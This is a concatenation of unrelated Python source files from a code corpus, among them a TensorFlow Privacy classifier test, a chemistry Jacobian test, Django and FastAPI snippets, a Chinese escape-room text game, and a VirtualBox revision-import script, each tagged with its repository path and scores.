root = Tk()
app = Application(master=root)
globals()["app"] = app
app.mainloop()
root.destroy()
"""
class TestObject:
def __init__(self, signals=Signal.all_signals, inputs={}, turns=10):
self.all_signals = signals
self.in_signals = list(filter(lambda x: x.io == "in", signals))
self.out_signals = list(filter(lambda x: x.io == "out", signals))
def print(self, turn, signals=self.signals):
""" | 2.71875 | 3 |
tensorflow_privacy/privacy/estimators/v1/dnn_test.py | amad-person/privacy | 2,327 | 12762166 | # Copyright 2020, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for DP-enabled DNNClassifier."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_privacy.privacy.estimators import test_utils
from tensorflow_privacy.privacy.estimators.v1 import dnn
from tensorflow_privacy.privacy.optimizers.dp_optimizer import DPGradientDescentGaussianOptimizer
class DPDNNClassifierTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for DP-enabled DNNClassifier."""
@parameterized.named_parameters(
('BinaryClassDNN', 2),
('MultiClassDNN 3', 3),
('MultiClassDNN 4', 4),
)
def testDNN(self, n_classes):
train_features, train_labels = test_utils.make_input_data(256, n_classes)
feature_columns = []
for key in train_features:
feature_columns.append(tf.feature_column.numeric_column(key=key))
optimizer = functools.partial(
DPGradientDescentGaussianOptimizer,
learning_rate=0.5,
l2_norm_clip=1.0,
noise_multiplier=0.0,
num_microbatches=1)
classifier = dnn.DNNClassifier(
hidden_units=[10],
activation_fn='relu',
feature_columns=feature_columns,
n_classes=n_classes,
optimizer=optimizer,
loss_reduction=tf.losses.Reduction.NONE)
classifier.train(
input_fn=test_utils.make_input_fn(train_features, train_labels, True,
16))
test_features, test_labels = test_utils.make_input_data(64, n_classes)
classifier.evaluate(
input_fn=test_utils.make_input_fn(test_features, test_labels, False,
16))
predict_features, predict_labels = test_utils.make_input_data(64, n_classes)
classifier.predict(
input_fn=test_utils.make_input_fn(predict_features, predict_labels,
False))
if __name__ == '__main__':
tf.test.main()
| 2.0625 | 2 |
tests/griffon/test_rhsjac_isochoric_open_adiabatic.py | sandialabs/Spitfire | 11 | 12762167 | import unittest
from numpy import hstack, max, abs, sqrt
from cantera import Solution, gas_constant
import numpy as np
from spitfire import ChemicalMechanismSpec
from os.path import join, abspath
from subprocess import getoutput
test_mech_directory = abspath(join('tests', 'test_mechanisms', 'old_xmls'))
mechs = [x.replace('.xml', '') for x in getoutput('ls ' + test_mech_directory + ' | grep .xml').split('\n')]
def rhs_cantera(p_arg, T_arg, y_arg, rhoin, Tin_arg, yin_arg, tau_arg, gas, rhs_chem_in):
gas.TPY = T_arg, p_arg, y_arg
rho = gas.density_mass
cv = gas.cv_mass
e = gas.standard_int_energies_RT * gas.T * gas_constant / gas.molecular_weights
gas.TDY = Tin_arg, rhoin, yin_arg
ein = gas.standard_int_energies_RT * gas.T * gas_constant / gas.molecular_weights
rhs = np.copy(rhs_chem_in)
rhsMass = np.zeros(gas.n_species + 1)
rhsMass[0] += (rhoin - rho)
rhsMass[1] += 1. / (rho * cv) * (rhoin * np.sum(yin_arg * (ein - e)))
rhsMass[2:] += rhoin / rho * (yin_arg[:-1] - y_arg[:-1])
rhs += rhsMass / tau_arg
return rhs
def validate_on_mechanism(mech, temperature, pressure, tau, do_rhs, do_jac):
xml = join(test_mech_directory, mech + '.xml')
T = temperature
Tin = T + 1000.
p = pressure
r = ChemicalMechanismSpec(xml, 'gas').griffon
gas = Solution(xml)
ns = gas.n_species
y = np.ones(ns) # equal masses in the reactor
gas.TPY = T, p, y
y = np.copy(gas.Y)
rho = gas.density_mass
xin = np.ones(ns) # equal moles in the feed
gas.TPX = Tin, p, xin
yin = np.copy(gas.Y)
rhoin = gas.density_mass
state = hstack((rho, T, y[:-1]))
rhsGRChemOnly = np.zeros(ns + 1)
r.reactor_rhs_isochoric(state, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, False, rhsGRChemOnly)
rhsCN = rhs_cantera(p, T, y, rhoin, Tin, yin, tau, gas, rhsGRChemOnly)
rhsGR = np.empty(ns + 1)
r.reactor_rhs_isochoric(state, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR)
if do_rhs:
return max(abs(rhsGR - rhsCN) / (abs(rhsCN) + 1.)) < 100. * sqrt(np.finfo(float).eps)
if do_jac:
jacGR = np.empty((ns + 1) * (ns + 1))
r.reactor_jac_isochoric(state, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, 0, rhsGR, jacGR)
jacGR = jacGR.reshape((ns + 1, ns + 1), order='F')
drho = 1.e-6
dT = 1.e-6
dY = 1.e-6
jacFD = np.empty((ns + 1, ns + 1))
rhsGR1, rhsGR2 = np.empty(ns + 1), np.empty(ns + 1)
state_m = hstack((rho - drho, T, y[:-1]))
state_p = hstack((rho + drho, T, y[:-1]))
r.reactor_rhs_isochoric(state_m, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR1)
r.reactor_rhs_isochoric(state_p, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR2)
jacFD[:, 0] = (- rhsGR1 + rhsGR2) / (2. * drho)
state_m = hstack((rho, T - dT, y[:-1]))
state_p = hstack((rho, T + dT, y[:-1]))
r.reactor_rhs_isochoric(state_m, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR1)
r.reactor_rhs_isochoric(state_p, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR2)
jacFD[:, 1] = (- rhsGR1 + rhsGR2) / (2. * dT)
for i in range(ns - 1):
y_m1, y_p1 = np.copy(y), np.copy(y)
y_m1[i] += - dY
y_m1[-1] -= - dY
y_p1[i] += dY
y_p1[-1] -= dY
state_m = hstack((rho, T, y_m1[:-1]))
state_p = hstack((rho, T, y_p1[:-1]))
r.reactor_rhs_isochoric(state_m, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR1)
r.reactor_rhs_isochoric(state_p, rhoin, Tin, yin, tau, 0, 0, 0, 0, 0, 0, True, rhsGR2)
jacFD[:, 2 + i] = (- rhsGR1 + rhsGR2) / (2. * dY)
return max(abs(jacGR - jacFD) / (abs(jacGR) + 1.)) < 4.e-3
def create_test(m, T, p, tau, do_rhs, do_jac):
def test(self):
self.assertTrue(validate_on_mechanism(m, T, p, tau, do_rhs, do_jac))
return test
class Accuracy(unittest.TestCase):
pass
tau_list = [1.e-6, 1.e-3]
for mech in mechs:
for tau in tau_list:
rhsname = 'test_rhs_' + mech + '_' + 'tau=' + str(tau)
jacname = 'test_jac_' + mech + '_' + 'tau=' + str(tau)
setattr(Accuracy, rhsname, create_test(mech, 600., 101325, tau, True, False))
if 'methane' not in mech: # skip methane in the finite difference Jacobian tests
setattr(Accuracy, jacname, create_test(mech, 600., 101325, tau, False, True))
if __name__ == '__main__':
unittest.main()
| 2 | 2 |
unknowntags/forms.py | rickvanderzwet/makerspaceleiden-crm | 0 | 12762168 | from django import forms
from django.forms import ModelForm
from django.conf import settings
from members.models import User
from .models import Unknowntag
class SelectUserForm(forms.Form):
user = forms.ModelChoiceField(queryset=User.objects.all())
activate_doors = forms.BooleanField(initial = True, help_text='Also give this user door permits if they did not have it yet.')
class SelectTagForm(forms.Form):
tag = forms.ModelChoiceField(queryset=Unknowntag.objects.all())
activate_doors = forms.BooleanField(initial = True, help_text='Also give this user door permits if they did not have it yet.')
| 2.34375 | 2 |
language-python-test/test/features/operators/isnot.py | wbadart/language-python | 0 | 12762169 | 3 is not 4
3 is not 3
3 is not 4 is not 5
| 1.835938 | 2 |
storage_bucket/upload_file.py | thomasborgen/storage-bucket | 4 | 12762170 | from storage_bucket.bucket import get_bucket
def upload_file(
*,
file_content: bytes,
storage_bucket_name: str,
filename: str,
content_type: str = 'application/octet-stream',
**kwargs: dict,
) -> None:
"""
Upload content of file_data to a google cloud storage bucket.
.. versionadded:: 0.0.1
:param file_data: contents to upload in bytes
:type file_data: bytes
:param bucket_name: Name of the google cloud bucket
:type bucket_name: str
:param filename: The name to give the uploaded file
:type filename: str
:param content_type: What type of file to create, defaults to text/plain
:type content_type: str
:return: None
"""
bucket = get_bucket(storage_bucket_name=storage_bucket_name)
blob = bucket.blob(filename)
blob.upload_from_string(
file_content,
content_type=content_type,
**kwargs,
)
| 2.953125 | 3 |
TextGameDemoV2.py | CXPhoenix/python-cli-game | 0 | 12762171 | <filename>TextGameDemoV2.py
import os
import sys
import time
def clearScene():
if sys.platform.startswith('win32'):
os.system('cls')
elif sys.platform.startswith('darwin'):
os.system('clear')
else:
raise Exception('This game just support Windows and MacOS system..')
def getChoice(options: list):
"""
Only for Windows and MacOS
"""
print("操作選項")
for i, option in enumerate(options, start=1):
print(f"{i}. {option}")
choice = input(': ')
clearScene()
return choice
def getNewScene(nowScene: str, choice: str, options: list, move: dict):
try:
choice = int(choice)-1
scene = move.get(options[choice])
return scene
except (ValueError, IndexError):
showWrongOption()
return nowScene
def showDesc(description: str, timeSet: float = 0.05):
show = ""
timer = int(timeSet*1000)
if timer != 0:
timer = 0.001 if timeSet < 0.001 else timeSet
for string in description:
clearScene()
show += string
print(show)
# time.sleep(timer)
else:
print(description)
#def showDesc(description: str):
# for string in description:
# ended = '' if description.index(string) != len(description)-1 else "\n"
# print(string, end='')
# time.sleep(0.1)
def showWrongOption():
print('Not a smart option..')
input(':enter')
clearScene()
#start
#為了使用者名字,因此得先初始化
clearScene()
print('歡迎來到文字遊戲世界')
name = input('請輸入你的名字: ')
for i in range(3):
clearScene()
print(f"Hello,{name}\n遊戲即將開始{'.'*(i+1)}!")
# time.sleep(1)
clearScene()
#set scene
startScene = ["你醒來在一個房間中,房間非常狹小,除了一張桌子、一個通往外面的門外,沒有其他東西。",
"桌子上面留有一封信給你",
"門旁邊有數字按鈕鎖",
"似乎你在一個...密室逃脫?"]
scene = {
#forward scene
'forward': {
'description': "一張桌子,上面放著一張紙條,似乎還有一個抽屜",
'options': "查看信 查看抽屜 向左轉 向右轉".split(),
'move': {
'查看信': 'mail',
'查看抽屜': 'drawer',
'向左轉': 'lefthand',
'向右轉': 'righthand',
},
},
'mail': {
'description':
f"""你好 {name},
歡迎來到文字型密室脫逃遊戲中。
似乎你已經被困在這個狹小的房間中,
巴不得趕快離開吧?
其實呢,要離開這裡非常簡單,
就是破解密碼而已,
一旦破解成功,
就直接逃出去了。
祝福你 逃出升天!
Best regards,
把你抓進來的人""",
'options': "把信放回桌上".split(),
'move': {
"把信放回桌上": "forward"
},
},
'drawer': {
'description': "打開抽屜後,空無一物,空氣中瀰漫著嘲笑你的聲音",
'options': "平靜地關閉抽屜 憤怒地關上抽屜".split(),
'move': {
'平靜地關閉抽屜': 'forward',
'憤怒地關上抽屜': 'forward',
},
},
'tableText': {
'description': "信風吹盡日,\n山中人歸心。\n壺中有高樓,\n飄蓬萊密林,\n千年未央碼。",
'options': "查看完畢".split(),
'move': {
'查看完畢': 'forward',
},
},
#lefthand scene
'lefthand': {
'description': '就只是一面牆',
'options': "向左轉 向右轉".split(),
'move': {
'向左轉': 'backward',
'向右轉': 'forward',
},
},
#righthand scene
'righthand': {
'description': '就只是一面牆',
'options': "向左轉 向右轉".split(),
'move': {
'向左轉': 'forward',
'向右轉': 'backward',
},
},
#backward scene
'backward': {
'description': '有一到門,門旁邊有一個密碼鎖',
'options': "使用密碼鎖 向左轉 向右轉".split(),
'move': {
'使用密碼鎖': 'lock',
'向左轉': 'righthand',
'向右轉': 'lefthand',
},
},
'lock': {
'description': '看起來是要輸入六位數字的密碼',
'options': '輸入密碼 向後退'.split(),
'move': {
'輸入密碼': 'lockInput',
'向後退': 'backward',
},
},
'lockInput': {
'description': '輸入六位數字的密碼',
},
}
endScene = [
"你成功的脫逃出這個奇怪的密室逃脫...",
"但是你有一種預感",
"這一切都還沒結束",
"......",
"阿,還有資科課要過啦..."
]
#game start
for s in startScene:
showDesc(s)
input('\n:enter')
clearScene()
#set var nowScene
nowScene = 'forward'
#game choice
while nowScene != 'GetOut':
if scene.get(nowScene).get('readed') or nowScene == 'mail':
showDesc(scene.get(nowScene).get('description'), 0)
else:
showDesc(scene.get(nowScene).get('description'))
scene.get(nowScene)['readed'] = True
if nowScene == 'lockInput':
lockpw = input(': ')
else:
print()
choice = getChoice(scene.get(nowScene).get('options'))
#scene options rebuild
#lockInput scene options
if nowScene == 'lockInput':
if len(lockpw) != 6:
clearScene()
print('Not good passwords..')
input(':enter')
nowScene = 'lock'
elif lockpw == '487919':
nowScene = 'GetOut'
else:
clearScene()
print('wrong passwords..')
input(':enter')
nowScene = 'lock'
clearScene()
#drawer scene options
elif nowScene == 'drawer':
nowScene = getNewScene(nowScene, choice, scene.get(nowScene).get("options"), scene.get(nowScene).get("move"))
scene.get('drawer')['hiddenCondition'] = scene.get('drawer').get('hiddenCondition') + choice + ' ' if scene.get('drawer').get('hiddenCondition') else choice + ' '
if scene.get('drawer').get('hiddenCondition'):
hiddenCondition = scene.get('drawer').get('hiddenCondition').split()
if len(hiddenCondition) >= 2:
if hiddenCondition[-2:len(hiddenCondition)] == ['1', '2']:
scene.get('forward')['description'] = "一張桌子,上面放著一張紙條,似乎還有一個抽屜\n桌子上好像有一段模糊的文字顯示出來..."
scene.get('forward')['options'] = "查看信 查看抽屜 向左轉 向右轉 查看桌上顯示的字".split()
scene.get('forward')['move']['查看桌上顯示的字'] = 'tableText'
else:
nowScene = getNewScene(nowScene, choice, scene.get(nowScene).get("options"), scene.get(nowScene).get("move"))
#end scene
for s in endScene:
showDesc(s)
input('\n:enter')
clearScene()
showDesc('The end..')
input(':enter for end..') | 3.515625 | 4 |
test/test_base_mission_generation.py | eriksalt/blades_helper_proj | 0 | 12762172 | import pytest
import test.mock_data_gateway
from blades_helper.mission_generator import _get_next_mission_type, _can_use_mission_type, _generate_base_missions
from blades_helper.mission_generator_constants import MissionGeneratorConstants as con
def setup_one_mission_base_build(mock, note, type):
mock.mission_counts.append((1, note))
mock.mission_types.append(type)
def check_array(source, target):
assert len(source)==len(target)
for i in range(len(source)):
assert source[i]==target[i]
def check_mission_type(mission, mission_type):
assert mission.mission_type == mission_type
def check_note_len(mission, notes_len):
assert len(mission.notes) == notes_len
def check_for_note(mission, note_to_find):
for note in mission.notes:
if note_to_find in note:
return
assert False
def check_requirement(mission, specialist):
return specialist in mission.requirements
def check_for_note_plus_one_specialist(mission, specialist):
check_for_note(mission, "Mission can include one additional specialist")
check_requirement(mission, specialist)
def check_for_note_favor(mission, favor_type):
check_for_note(mission, con.FAVOR_NOTE[0:-3])
check_for_note(mission, favor_type)
def check_mission(mission, mission_type, target, rewards, penalties, notes_len, requirement, contained_notes):
check_mission_type(mission, mission_type)
assert mission.target == target
check_array(mission.rewards, rewards)
check_array(mission.penalties, penalties)
check_note_len(mission, notes_len)
if not requirement == con.NOTHING:
check_requirement(mission, requirement)
for contained_note in contained_notes:
check_for_note(mission, contained_note)
def test_get_next_mission_type():
assert _get_next_mission_type(con.ASSAULT) == con.RECON
assert _get_next_mission_type(con.RECON) == con.RELIGIOUS
assert _get_next_mission_type(con.RELIGIOUS)==con.SUPPLY
assert _get_next_mission_type(con.SUPPLY) == con.COMMANDER_FOCUS
with pytest.raises(AssertionError):
_get_next_mission_type(con.COMMANDER_FOCUS)
with pytest.raises(AssertionError):
_get_next_mission_type(con.GM_CHOICE)
def test_can_use_mission_type():
assert not _can_use_mission_type(con.SUPPLY, [con.ASSAULT])
assert _can_use_mission_type(con.SPECIAL, [con.SPECIAL])
assert _can_use_mission_type(con.GM_CHOICE, [con.GM_CHOICE])
assert not _can_use_mission_type(con.SUPPLY, [])
assert _can_use_mission_type(con.SUPPLY, [con.SUPPLY])
assert _can_use_mission_type(con.SUPPLY, [con.ASSAULT, con.SUPPLY])
assert _can_use_mission_type(con.SUPPLY, [con.SUPPLY, con.ASSAULT])
def test_make_one_mission():
mock = test.mock_data_gateway.MockDataGateway()
mock.titles.append('bunker hill')
setup_one_mission_base_build(mock, con.NOTHING, con.RELIGIOUS)
missions =_generate_base_missions(mock, False, False, False, con.SUPPLY, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
assert len(missions)==1
mission = missions[0]
check_mission(mission, con.RELIGIOUS, con.NOTHING, [], [], 0, con.required_religious_specialists, [])
def test_one_has_favor():
mock = test.mock_data_gateway.MockDataGateway()
mock.favor_types.append(con.THE_WILD)
setup_one_mission_base_build(mock, con.ONE_HAS_FAVOR, con.SUPPLY)
missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
assert len(missions)==1
mission = missions[0]
check_mission(mission,con.SUPPLY,con.NOTHING,[],[],1,con.required_supply_specialists,[con.FAVOR_NOTE[0:-3], con.THE_WILD])
def test_one_extra_specialist():
mock = test.mock_data_gateway.MockDataGateway()
mock.specialists.append(con.SNIPER)
setup_one_mission_base_build(mock, con.PLUS_ONE_SPECIALIST, con.SUPPLY)
missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
mission = missions[0]
check_mission(mission, con.SUPPLY, con.NOTHING, [],[], 1, con.required_supply_specialists, ["Mission can include one additional specialist"])
check_for_note_plus_one_specialist(mission, con.SNIPER)
def test_commanders_focus():
mock = test.mock_data_gateway.MockDataGateway()
setup_one_mission_base_build(mock, con.NOTHING, con.COMMANDER_FOCUS)
missions =_generate_base_missions( mock, False, False, False, con.RECON, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
mission = missions[0]
check_mission(mission, con.RECON, con.NOTHING, [],[], 0,con.required_recon_specialists,[])
def test_gm_choice():
mock = test.mock_data_gateway.MockDataGateway()
setup_one_mission_base_build(mock, con.NOTHING, con.GM_CHOICE)
missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.RECON, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT, con.RECON] )
mission = missions[0]
check_mission(mission, con.RECON, con.NOTHING, [],[], 0,con.required_recon_specialists,[])
def test_unavailable_mission():
#test simple unavailability
mock = test.mock_data_gateway.MockDataGateway()
setup_one_mission_base_build(mock, con.NOTHING, con.RECON)
missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.RECON, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
mission = missions[0]
check_mission(mission, con.RELIGIOUS, con.NOTHING, [],[], 0,con.required_religious_specialists,[])
#test when mutiple missions unavailable
setup_one_mission_base_build(mock, con.NOTHING, con.ASSAULT)
missions =_generate_base_missions( mock, False, False, False, con.UNDEFINED, con.ASSAULT, [] )
mission = missions[0]
check_mission(mission, con.UNDEFINED, con.NOTHING, [],[], 0,con.NOTHING,[])
def test_special_missions_are_allowed():
# special
mock = test.mock_data_gateway.MockDataGateway()
setup_one_mission_base_build(mock, con.NOTHING, con.SPECIAL)
missions =_generate_base_missions( mock, False, False, False, con.ASSAULT, con.ASSAULT, [] )
mission = missions[0]
check_mission(mission, con.SPECIAL, con.NOTHING, [],[], 0,con.NOTHING,[])
def create_mission_with_gm_choice_and_note(mock, choice, note, spymaster_buy=False):
setup_one_mission_base_build(mock, note, con.GM_CHOICE)
missions =_generate_base_missions( mock, spymaster_buy, False, False, con.ASSAULT, choice, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
assert len(missions) == 1
return missions[0]
def create_mission_with_commander_focus_and_note(mock, focus,note, spymaster_buy=False):
setup_one_mission_base_build(mock, note, con.COMMANDER_FOCUS)
missions =_generate_base_missions( mock, spymaster_buy, False, False, focus, con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
assert len(missions) == 1
return missions[0]
def test_commander_focus_plus_one_specialist():
mock = test.mock_data_gateway.MockDataGateway()
mock.specialists.append(con.HEAVY)
focus=con.SUPPLY
note=con.PLUS_ONE_SPECIALIST
mission=create_mission_with_commander_focus_and_note(mock, focus, note)
check_mission_type(mission, focus)
check_note_len(mission, 1)
check_for_note_plus_one_specialist(mission, con.HEAVY)
def test_commander_focus_one_has_favor():
mock = test.mock_data_gateway.MockDataGateway()
mock.favor_types.append(con.HOLY)
focus=con.SUPPLY
note=con.ONE_HAS_FAVOR
mission=create_mission_with_commander_focus_and_note(mock, focus, note)
check_mission_type(mission, focus)
check_note_len(mission, 1)
check_for_note_favor(mission, con.HOLY)
def test_commander_focus_one_is_special():
mock = test.mock_data_gateway.MockDataGateway()
focus=con.SUPPLY
note=con.ONE_IS_SPECIAL
mission=create_mission_with_commander_focus_and_note(mock, focus, note)
check_mission_type(mission, con.SPECIAL)
check_note_len(mission, 0)
def test_gm_choice_plus_one_specialist():
mock = test.mock_data_gateway.MockDataGateway()
mock.specialists.append(con.HEAVY)
choice=con.SUPPLY
note=con.PLUS_ONE_SPECIALIST
mission=create_mission_with_gm_choice_and_note(mock, choice, note)
check_mission_type(mission, choice)
check_note_len(mission, 1)
check_for_note_plus_one_specialist(mission, con.HEAVY)
def test_gm_choice_one_has_favor():
mock = test.mock_data_gateway.MockDataGateway()
mock.favor_types.append(con.HOLY)
choice=con.SUPPLY
note=con.ONE_HAS_FAVOR
mission=create_mission_with_gm_choice_and_note(mock, choice, note)
check_mission_type(mission, choice)
check_note_len(mission, 1)
check_for_note_favor(mission, con.HOLY)
def test_gm_choice_one_is_special():
mock = test.mock_data_gateway.MockDataGateway()
choice=con.SUPPLY
note=con.ONE_IS_SPECIAL
mission=create_mission_with_gm_choice_and_note(mock, choice, note)
check_mission_type(mission, con.SPECIAL)
check_note_len(mission, 0)
def test_simple_spymaster_spend():
mock=test.mock_data_gateway.MockDataGateway()
setup_one_mission_base_build(mock, con.NOTHING, con.SUPPLY)
missions =_generate_base_missions( mock, True, False, False, con.ASSAULT,con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
assert len(missions) == 1
check_mission_type(missions[0], con.SPECIAL)
def test_one_mission_with_spymaster_and_one_is_special():
mock=test.mock_data_gateway.MockDataGateway()
setup_one_mission_base_build(mock, con.ONE_IS_SPECIAL, con.SUPPLY)
missions =_generate_base_missions( mock, True, False, False, con.ASSAULT,con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
assert len(missions) == 1
check_mission_type(missions[0], con.SPECIAL)
check_note_len(missions[0],0)
def test_two_missions_with_spymaster_and_one_is_special():
mock=test.mock_data_gateway.MockDataGateway()
mock.mission_counts.append((2, con.ONE_IS_SPECIAL))
mock.mission_types.append(con.RECON)
mock.mission_types.append(con.SUPPLY)
missions =_generate_base_missions( mock, True, False, False, con.ASSAULT,con.ASSAULT, [con.RELIGIOUS, con.SUPPLY, con.ASSAULT] )
assert len(missions) == 2
check_mission_type(missions[0], con.SPECIAL)
check_note_len(missions[0],0)
check_mission_type(missions[1], con.SPECIAL)
check_note_len(missions[1],0)
def setup_three_missions(mock, note, first_type, second_type, third_type, commanders_focus, gms_choice, spymaster_buy=False):
mock.mission_counts.append((3, note))
mock.mission_types.append(first_type)
mock.mission_types.append(second_type)
mock.mission_types.append(third_type)
missions = _generate_base_missions(mock, spymaster_buy, False, False, commanders_focus, gms_choice, [con.ASSAULT, con.RECON, con.SUPPLY, con.RELIGIOUS])
assert len(missions)==3
return missions
def test_three_simple_missions():
mock=test.mock_data_gateway.MockDataGateway()
note=con.NOTHING
first_type=con.RELIGIOUS
second_type=con.SUPPLY
third_type=con.RECON
spymaster_buy=False
commander_focus=con.ASSAULT
gm_choice=con.ASSAULT
missions=setup_three_missions(mock, note, first_type, second_type, third_type, commander_focus, gm_choice, spymaster_buy)
check_mission_type(missions[0], con.RELIGIOUS)
check_mission_type(missions[1], con.SUPPLY)
check_mission_type(missions[2], con.RECON)
def test_three_missions_with_one_is_special():
mock=test.mock_data_gateway.MockDataGateway()
mock.random_missions.append(1)
mock.specialists.append(con.HEAVY)
note=con.PLUS_ONE_SPECIALIST
first_type=con.RELIGIOUS
second_type=con.SUPPLY
third_type=con.RECON
spymaster_buy=False
commander_focus=con.ASSAULT
gm_choice=con.ASSAULT
missions=setup_three_missions(mock, note, first_type, second_type, third_type, commander_focus, gm_choice, spymaster_buy)
check_mission_type(missions[0], con.RELIGIOUS)
check_mission_type(missions[1], con.SUPPLY)
check_mission_type(missions[2], con.RECON)
check_for_note_plus_one_specialist(missions[1],con.HEAVY)
def test_three_missions_with_spymaster_buy_and_one_is_special():
mock=test.mock_data_gateway.MockDataGateway()
note=con.ONE_IS_SPECIAL
first_type=con.RELIGIOUS
second_type=con.SUPPLY
third_type=con.RECON
spymaster_buy=True
commander_focus=con.ASSAULT
gm_choice=con.ASSAULT
missions=setup_three_missions(mock, note, first_type, second_type, third_type, commander_focus, gm_choice, spymaster_buy)
check_mission_type(missions[0], con.SPECIAL)
check_mission_type(missions[1], con.SPECIAL)
check_mission_type(missions[2], con.RELIGIOUS)
| 2.109375 | 2 |
app/backend/app/api/api_v1/endpoints/category.py | matayoos/invoice-scrapper | 0 | 12762173 | from typing import Any, List
from app.schemas.category import CategoryResponse
from fastapi import APIRouter, Depends, status, HTTPException
from sqlalchemy.orm import Session
from app import crud, schemas
from app.api import deps
router = APIRouter()
@router.get(
"/", response_model=List[schemas.CategoryResponse], status_code=status.HTTP_200_OK
)
def read_categories(
db: Session = Depends(deps.get_db), skip: int = 0, limit: int = 100
) -> Any:
return crud.read_categories(db, skip=skip, limit=limit)
@router.post("/", response_model=CategoryResponse, status_code=status.HTTP_200_OK)
def create_category(
obj_in: schemas.CategoryCreate, db: Session = Depends(deps.get_db)
) -> Any:
is_a_registered_category = crud.get_category_by_name(db, obj_in.name)
if is_a_registered_category:
raise HTTPException(status_code=400, detail="Category already registered")
return crud.create_category(db, obj_in=obj_in)
| 2.46875 | 2 |
vbox/src/VBox/ValidationKit/testmanager/batch/vcs_import.py | Nurzamal/rest_api_docker | 0 | 12762174 | <reponame>Nurzamal/rest_api_docker<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# $Id: vcs_import.py 71157 2018-02-28 15:38:15Z vboxsync $
# pylint: disable=C0301
"""
Cron job for importing revision history for a repository.
"""
from __future__ import print_function;
__copyright__ = \
"""
Copyright (C) 2012-2017 Oracle Corporation
This file is part of VirtualBox Open Source Edition (OSE), as
available from http://www.virtualbox.org. This file is free software;
you can redistribute it and/or modify it under the terms of the GNU
General Public License (GPL) as published by the Free Software
Foundation, in version 2 as it comes in the "COPYING" file of the
VirtualBox OSE distribution. VirtualBox OSE is distributed in the
hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
The contents of this file may alternatively be used under the terms
of the Common Development and Distribution License Version 1.0
(CDDL) only, as it comes in the "COPYING.CDDL" file of the
VirtualBox OSE distribution, in which case the provisions of the
CDDL are applicable instead of those of the GPL.
You may elect to license modified versions of this file under the
terms and conditions of either the GPL or the CDDL or both.
"""
__version__ = "$Revision: 71157 $"
# Standard python imports
import sys;
import os;
from optparse import OptionParser; # pylint: disable=deprecated-module
import xml.etree.ElementTree as ET;
# Add Test Manager's modules path
g_ksTestManagerDir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))));
sys.path.append(g_ksTestManagerDir);
# Test Manager imports
from testmanager.core.db import TMDatabaseConnection;
from testmanager.core.vcsrevisions import VcsRevisionData, VcsRevisionLogic;
from common import utils;
class VcsImport(object): # pylint: disable=R0903
"""
Imports revision history from a VSC into the Test Manager database.
"""
def __init__(self):
"""
Parse command line.
"""
oParser = OptionParser()
oParser.add_option('-e', '--extra-option', dest = 'asExtraOptions', action = 'append',
help = 'Adds a extra option to the command retrieving the log.');
oParser.add_option('-f', '--full', dest = 'fFull', action = 'store_true',
help = 'Full revision history import.');
oParser.add_option('-q', '--quiet', dest = 'fQuiet', action = 'store_true',
help = 'Quiet execution');
oParser.add_option('-R', '--repository', dest = 'sRepository', metavar = '<repository>',
help = 'Version control repository name.');
oParser.add_option('-s', '--start-revision', dest = 'iStartRevision', metavar = 'start-revision',
type = "int", default = 0,
help = 'The revision to start at when doing a full import.');
oParser.add_option('-t', '--type', dest = 'sType', metavar = '<type>',
help = 'The VCS type (default: svn)', choices = [ 'svn', ], default = 'svn');
oParser.add_option('-u', '--url', dest = 'sUrl', metavar = '<url>',
help = 'The VCS URL');
(self.oConfig, _) = oParser.parse_args();
# Check command line
asMissing = [];
if self.oConfig.sUrl is None: asMissing.append('--url');
if self.oConfig.sRepository is None: asMissing.append('--repository');
if asMissing:
sys.stderr.write('syntax error: Missing: %s\n' % (asMissing,));
sys.exit(1);
assert self.oConfig.sType == 'svn';
def main(self):
"""
Main function.
"""
oDb = TMDatabaseConnection();
oLogic = VcsRevisionLogic(oDb);
# Where to start.
iStartRev = 0;
if not self.oConfig.fFull:
iStartRev = oLogic.getLastRevision(self.oConfig.sRepository);
if iStartRev == 0:
iStartRev = self.oConfig.iStartRevision;
# Construct a command line.
os.environ['LC_ALL'] = 'en_US.utf-8';
asArgs = [
'svn',
'log',
'--xml',
'--revision', str(iStartRev) + ':HEAD',
];
if self.oConfig.asExtraOptions is not None:
asArgs.extend(self.oConfig.asExtraOptions);
asArgs.append(self.oConfig.sUrl);
if not self.oConfig.fQuiet:
print('Executing: %s' % (asArgs,));
